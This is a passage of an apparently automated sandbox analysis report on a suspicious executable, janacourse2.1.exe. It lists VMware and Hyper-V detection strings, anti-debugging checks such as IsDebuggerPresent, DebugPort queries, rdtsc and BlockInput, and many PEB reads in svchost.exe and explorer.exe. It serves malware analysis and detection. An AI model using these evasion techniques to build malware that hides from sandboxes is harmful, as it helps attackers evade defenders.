          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01025C97 FindFirstFileW,FindNextFileW,FindClose,0_2_01025C97
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB42DE
          Source: explorer.exe, 00000002.00000002.2898901245.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000002.2898901245.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000000.1665725530.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: janacourse2.1.exe, 00000000.00000002.1652629769.0000000001178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A1KvmCiZKdUEI0cV
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.1665725530.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000000.1669146170.000000000CA96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
          Source: explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040ACF0 LdrLoadDll,1_2_0040ACF0
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102EAA2 BlockInput,0_2_0102EAA2
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE2622
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB42DE
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD4CE8 mov eax, dword ptr fs:[00000030h]0_2_00FD4CE8
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_014DA858 mov eax, dword ptr fs:[00000030h]0_2_014DA858
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_014DBEF8 mov eax, dword ptr fs:[00000030h]0_2_014DBEF8
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_014DBE98 mov eax, dword ptr fs:[00000030h]0_2_014DBE98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]1_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]1_2_034D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]1_2_0350634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]1_2_034D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]1_2_0342C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]1_2_03450310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
